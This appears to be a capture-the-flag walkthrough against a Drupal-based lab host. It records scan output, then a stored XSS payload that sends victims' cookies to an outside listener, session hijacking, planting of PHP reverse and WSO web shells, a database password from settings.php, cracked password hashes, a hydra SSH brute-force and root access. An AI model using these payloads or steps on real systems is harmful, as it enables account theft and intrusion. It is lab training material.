- First Step is scan the application, Nmap / Nikto:
- nmap -sV 172.16.11.181
PORT
STATE SERVICE VERSION
21/tcp
open ftp vsftpd 2.0.5
22/tcp
open ssh OpenSSH 4.3 (protocol 2.0)
25/tcp
open smtp Symantec Enterprise Security manager smtpd
80/tcp
open http Apache httpd 2.2.3 ((CentOS))
110/tcp
open pop3 Dovecot pop3d
111/tcp
open rpcbind 2 (RPC #100000)
139/tcp
open netbios-ssn Samba smbd 3.X (workgroup: WORKGROUP)
143/tcp
open imap Dovecot imapd
443/tcp
open ssl/http Apache httpd 2.2.3 ((CentOS))
445/tcp
open netbios-ssn Samba smbd 3.X (workgroup: WORKGROUP)
993/tcp
open ssl/imap Dovecot imapd
995/tcp
open ssl/pop3 Dovecot pop3d
3306/tcp
open mysql MySQL (unauthorized)
5801/tcp
open vnc-http RealVNC 4.0 (resolution: 400x250; VNC TCP port:
5901)
5802/tcp
open vnc-http RealVNC 4.0 (resolution: 400x250; VNC TCP port:
5902)
5901/tcp
open vnc VNC (protocol 3.8)
5902/tcp
open vnc VNC (protocol 3.8)
5903/tcp
open vnc VNC (protocol 3.8)
6001/tcp
open X11 (access denied)
6002/tcp
open X11 (access denied)
6003/tcp
open X11 (access denied)
6004/tcp
open X11 (access denied)
Service
Info: Host: localhost.localdomain; OS: Unix Cent OS
- nikto -h 172.16.11.181
+
Server: Apache/2.2.3 (CentOS)
+
Retrieved x-powered-by header: PHP/5.1.6
+
OSVDB-3268: /scripts/: Directory indexing found.
+
robots.txt contains 36 entries which should be manually viewed.
+
Apache/2.2.3 appears to be outdated (current is at least
Apache/2.2.19). Apache 1.3.42 (final release) and 2.0.64 are also
current.
+
ETag header found on server, fields:
0x0f09ceda40c2bc564fc7b1c947d96711
+
DEBUG HTTP verb may show server debugging information. See
http://msdn.microsoft.com/en-us/library/e8z01xdh%28VS.80%29.aspx for
details.
+
OSVDB-877: HTTP TRACE method is active, suggesting the host is
vulnerable to XST
+
OSVDB-44056: /sips/sipssys/users/a/admin/user: SIPS v0.2.2 allows
user account info (including password) to be retrieved remotely.
+
OSVDB-27071: /phpimageview.php?pic=javascript:alert(8754): PHP Image
View 1.0 is vulnerable to Cross Site Scripting (XSS).
http://www.cert.org/advisories/CA-2000-02.html.
+
OSVDB-3931:
/myphpnuke/links.php?op=MostPopular&ratenum=[script]alert(document.cookie);[/script]&ratetype=percent:
myphpnuke is vulnerable to Cross Site Scripting (XSS).
http://www.cert.org/advisories/CA-2000-02.html.
+
/modules.php?op=modload&name=FAQ&file=index&myfaq=yes&id_cat=1&categories=%3Cimg%20src=javascript:alert(9456);%3E&parent_id=0:
Post Nuke 0.7.2.3-Phoenix is vulnerable to Cross Site Scripting
(XSS). http://www.cert.org/advisories/CA-2000-02.html.
+
/modules.php?letter=%22%3E%3Cimg%20src=javascript:alert(document.cookie);%3E&op=modload&name=Members_List&file=index:
Post Nuke 0.7.2.3-Phoenix is vulnerable to Cross Site Scripting
(XSS). http://www.cert.org/advisories/CA-2000-02.html.
+
OSVDB-2946:
/forum_members.asp?find=%22;}alert(9823);function%20x(){v%20=%22: Web
Wiz Forums ver. 7.01 and below
is vulnerable to Cross Site Scripting (XSS).
http://www.cert.org/advisories/CA-2000-02.html.
+
OSVDB-3233: /phpinfo.php:
Contains PHP configuration information
+
OSVDB-4806: /support/messages: Axis WebCam allows retrieval of
messages file (/var/log/messages). See
http://www.websec.org/adv/axis2400.txt.html
+
OSVDB-12184: /index.php?=PHPB8B5F2A0-3C92-11d3-A3A9-4C7B08C10000: PHP
reveals potentially sensitive information via certain HTTP requests
that contain specific QUERY strings.
+
OSVDB-3268: /includes/: Directory indexing found.
+
OSVDB-3092: /includes/: This might be interesting...
+
OSVDB-3092: /marketing/: This might be interesting...
+
OSVDB-3268: /misc/:
Directory indexing found.
+
OSVDB-3092: /misc/: This might be interesting...
+
OSVDB-3092: /sales/: This might be interesting...
+
OSVDB-3092: /support/: This might be interesting...
+
OSVDB-3092: /user/: This might be interesting...
+
OSVDB-3092: /scripts/: This might be interesting... possibly a system
shell found.
+
OSVDB-3092: /manual/: Web server manual found.
+
OSVDB-3093: /mail/src/read_body.php: This might be interesting... has
been seen in web logs from an unknown scanner.
+
OSVDB-3093: /webmail/src/read_body.php: This might be interesting...
has been seen in web logs from an unknown scanner.
+
OSVDB-3268: /icons/: Directory indexing found.
+
OSVDB-3268: /manual/images/: Directory indexing found.
+
OSVDB-3092: /scripts/showuser.cgi: Shows the output of the 'whoami'
command, which shows the web server user.
+
OSVDB-3092: /UPGRADE.txt: Default file found.
+
OSVDB-3092: /install.php: Drupal install.php file found.
+
OSVDB-3092: /install.php:
install.php file found.
+
OSVDB-3092: /LICENSE.txt: License file found may identify site
software.
+
OSVDB-3092: /xmlrpc.php: xmlrpc.php was found.
+
OSVDB-3233: /INSTALL.mysql.txt:
Drupal installation file found.
+
OSVDB-3233: /INSTALL.pgsql.txt:
Drupal installation file found.
+
OSVDB-3233: /icons/README: Apache default file found.
+
/webmail/src/configtest.php: Squirrelmail configuration test may
reveal version and system info.
+
OSVDB-3268: /sites/: Directory indexing found.
+
6456 items checked: 1 error(s) and 41 item(s) reported on remote host
+
End Time: 2017-02-20 18:05:24 (537 seconds)
More Information:
/webmail/src/read_body.php
SquirrelMail
version 1.4.8-21.el5.centos
By
the SquirrelMail Project Team
XML-RPC server accepts POST requests only.
XML-RPC server accepts POST requests only.
CentOS
Apache
2.2
- Checking the website (View source, create a new account, buttons etc...)
* insert a script to the search box and check the source (the script is filtered).
* find more information about the system via source code.
* The application is base on Drupal System (theme is /themes/algaglas).
* Retrieved x-powered-by header: PHP/5.1.6 so check the check phpinfo.
* Create a new user, log in and look after new options:
* All the users have an ID (The first is Admin).
* All the pages have an ID (Hidden Page has 28).
* There are only 2 users who wrote articles in the website:
(Barbara from marketing and Steave from Executives). - XSS
* add a command.
* add a command with an alert <script>alert()</script> (Working!)
* The website has Users that mean we can get a cookie of someone else with higher permissions than me. I prefer Steve because he has higher position.
* paste a comment with script in one of his articles and wait:<script>new Image().src="http://172.16.3.3:1234/a.php?cookie="+encodeURI(document.cookie);</script>
*
There is a contact option; we can send emails to other users, ask
them to visit in the page, check our social engineering skills :) and
take their session.
* send an email to Steave and wait:hello steve my name is lior i dont understand what you wrote in line number 5 in this article please check and let me know
* send an email to Steave and wait:hello steve my name is lior i dont understand what you wrote in line number 5 in this article please check and let me know
Thanks
*
The SSED of Steve is
SESS86615d91cc2c2a92d23dfb632b363094=fi9ptbbvdc17iaprlchiajeqt7
We logged in as Steve :)
* Now, I will add admin Privileges to my user! No need cookies anymore :)
* Check the website with higher permissions.
* In every page there is an option to change the input format, change to php.
We logged in as Steve :)
* Now, I will add admin Privileges to my user! No need cookies anymore :)
* Check the website with higher permissions.
* In every page there is an option to change the input format, change to php.
* insert a php code and check the page: (Working!)
<?php
phpinfo()
?>
*
insert a php reverse shell code and web application shell code
(wso).
* in the php reverse shell I don’t have enough permissions, keep going with wso.
* in the php reverse shell I don’t have enough permissions, keep going with wso.
*
The wso is working writable but there is no option to upload files,
so we need to download the web application shell code direcltly to
the local machine.
Cd
to the file use SimpleHTTPServer and use wget to download it to a
writeable place. Run the file.
Check
the /etc/Passwd file:
root:x:0:0:root:/root:/bin/bash
bin:x:1:1:bin:/bin:/sbin/nologin
daemon:x:2:2:daemon:/sbin:/sbin/nologin
adm:x:3:4:adm:/var/adm:/sbin/nologin
lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin
sync:x:5:0:sync:/sbin:/bin/sync
shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
halt:x:7:0:halt:/sbin:/sbin/halt
mail:x:8:12:mail:/var/spool/mail:/sbin/nologin
news:x:9:13:news:/etc/news:
uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin
operator:x:11:0:operator:/root:/sbin/nologin
games:x:12:100:games:/usr/games:/sbin/nologin
gopher:x:13:30:gopher:/var/gopher:/sbin/nologin
ftp:x:14:50:FTP
User:/var/ftp:/sbin/nologin
nobody:x:99:99:Nobody:/:/sbin/nologin
apache:x:48:48:Apache:/var/www:/sbin/nologin
rpc:x:32:32:Portmapper
RPC user:/:/sbin/nologin
rpcuser:x:29:29:RPC
Service User:/var/lib/nfs:/sbin/nologin
nfsnobody:x:65534:65534:Anonymous
NFS User:/var/lib/nfs:/sbin/nologin
mailnull:x:47:47::/var/spool/mqueue:/sbin/nologin
smmsp:x:51:51::/var/spool/mqueue:/sbin/nologin
distcache:x:94:94:Distcache:/:/sbin/nologin
nscd:x:28:28:NSCD
Daemon:/:/sbin/nologin
vcsa:x:69:69:virtual
console memory owner:/dev:/sbin/nologin
sshd:x:74:74:Privilege-separated
SSH:/var/empty/sshd:/sbin/nologin
webalizer:x:67:67:Webalizer:/var/www/usage:/sbin/nologin
dovecot:x:97:97:dovecot:/usr/libexec/dovecot:/sbin/nologin
squid:x:23:23::/var/spool/squid:/sbin/nologin
mysql:x:27:27:MySQL
Server:/var/lib/mysql:/bin/bash
pcap:x:77:77::/var/arpwatch:/sbin/nologin
ntp:x:38:38::/etc/ntp:/sbin/nologin
dbus:x:81:81:System
message bus:/:/sbin/nologin
haldaemon:x:68:68:HAL
daemon:/:/sbin/nologin
avahi:x:70:70:Avahi
daemon:/:/sbin/nologin
named:x:25:25:Named:/var/named:/sbin/nologin
avahi-autoipd:x:100:101:avahi-autoipd:/var/lib/avahi-autoipd:/sbin/nologin
xfs:x:43:43:X
Font Server:/etc/X11/fs:/sbin/nologin
sabayon:x:86:86:Sabayon
user:/home/sabayon:/sbin/nologin
jharraway:x:500:504::/home/jharraway:/bin/bash
spinkton:x:501:505::/home/spinkton:/bin/bash
sholden:x:502:506::/home/sholden:/bin/bash
bdio:x:503:507::/home/bdio:/bin/bash
jalderman:x:504:508::/home/jalderman:/bin/bash
gconnor:x:505:509::/home/gconnor:/bin/bash
sswiney:x:506:510::/home/sswiney:/bin/bash
dhart:x:507:511::/home/dhart:/bin/bash
gprune:x:508:512::/home/gprune:/bin/bash
hplink:x:509:513::/home/hplink:/bin/bash
jgrimes:x:510:514::/home/jgrimes:/bin/bash
shunter:x:511:515::/home/shunter:/bin/bash
jingersol:x:512:516::/home/jingersol:/bin/bash
mswanson:x:513:517::/home/mswanson:/bin/bash
jstone:x:514:518::/home/jstone:/bin/bash
jgoldman:x:515:519::/home/jgoldman:/bin/bash
tmaloney:x:516:520::/home/tmaloney:/bin/bash
xbruce:x:517:521::/home/xbruce:/bin/bash
sloreman:x:518:522:#flag#5b650c18929383074fea8870d857dd2e:/home/sloreman:/bin/bash
Nikto scanning find an install.php file
+
OSVDB-3092: /install.php:
install.php file found.
There
is a note: To install to a different database, edit the appropriate
settings.php file in the sites folder.
*
Now, we have more permissions.
Search in Google what is the configuration file of Drupal and find him: (settings.php)
Search in Google what is the configuration file of Drupal and find him: (settings.php)
*
check the settings.php file:
$db_url
= 'mysqli://root:JumpUpAndDown@localhost/drupal';
$db_prefix
= '';
Mysql
User: root
Mysql
Password: JumpUpAndDown
Connect
to Sql and find information:
In
user file there is all the users and hashes to the application
SELECT concat(name,':',pass) FROM `users` LIMIT 0,30
2 ways to find all the passwords, john tusers --format=Raw-MD5 and crackstation
SELECT concat(name,':',pass) FROM `users` LIMIT 0,30
2 ways to find all the passwords, john tusers --format=Raw-MD5 and crackstation
Dan:8f75ad3f04fc42f07c95e2f3d0ec3503:BaseballSeason
Jim:2a5de0f53b1317f7e36afcdb6b5202a4:letmein!
Barbara:bed128365216c019988915ed3add75fb:passw0rd
Xavier:3005d829eb819341357bfddf541c175b:thundercats
Jeff:ca594f739e257245f2be69eb546c1c04:sitepass
George:ed2b1f468c5f915f3f1cf75d7068baae:12341234
Tom:971dcf53e88e9268714d9d504753d347:drupalpassword
John:518462cd3292a67c755521c1fb50c909:4summer13
Sally:7a1c07ff60f9c07ffe8da34ecbf4edc2:fantasy
Steve:08d15a4aef553492d8971cdd5198f314:drupal
Johnathan:6dc523ebd2379d96cc0af32e2d224db0:1loveU
lior:e10adc3949ba59abbe56e057f20f883e:123456
Susan:0d42223010b69cab86634bc359ed870b:BobMarley
admin:49265c16d1dff8acef3499bd889299d6:football123
Stacey:85aca385eb555fb6a36a62915ddd8bc7:Seventy70
Sherry:c3319d1016a802db86653bcfab871f4f:1website
Juan:573152cc51de19df50e90b0e557db7fe:swanson
Michael:c7a4476fc64b75ead800da9ea2b7d072:cherry
Make
a file with etc/passwd users and another file with Application’s
passwords and try to hack.hydra
-L tusers -P tpasswords ssh://172.16.11.181
Users
were found:
Username:
jharraway Password:
letmein!
Username:
bdio Password:
passw0rd
Username:
spinkton Password:
football123
Try
to log in to all of them and make file with sudo.
-
Username: jharraway Password: letmein!
Not Working! - Username: bdio Password: passw0rd
Not Working! - Username: spinkton Password: football123
I
AM R-O-O-T!!
Flags:
1.
#flag#550e1bafe077ff0b0b67f4e32f29d751 (View Source)
2.
#flag#57dbe55b42b307fb4115146d239955d0
(http://172.16.11.181/node/28/)
3.
#flag#550e1bafe077ff0b0b67f4e32f29d751 (phpinfo.php)
4.
#flag#5b650c18929383074fea8870d857dd2e (/etc/passwd - sloreman)
5.
#flag#5e937c51b852e1ee90d42ddb5ccb8997 (ssh root, and all the other
users)
6.
#flag#fd38e201f27e98e13abcf62890c43303 (sql admin hash)
7.
#flag#5e937c51b852e1ee90d42ddb5ccb8997 (bio + jharraway ssh)
8.
#flag#motd-flag (bdio + jharraway ssh)
9. #flag#0ab251c07822d26b07b88136739ae39b (spinkton user)
9. #flag#0ab251c07822d26b07b88136739ae39b (spinkton user)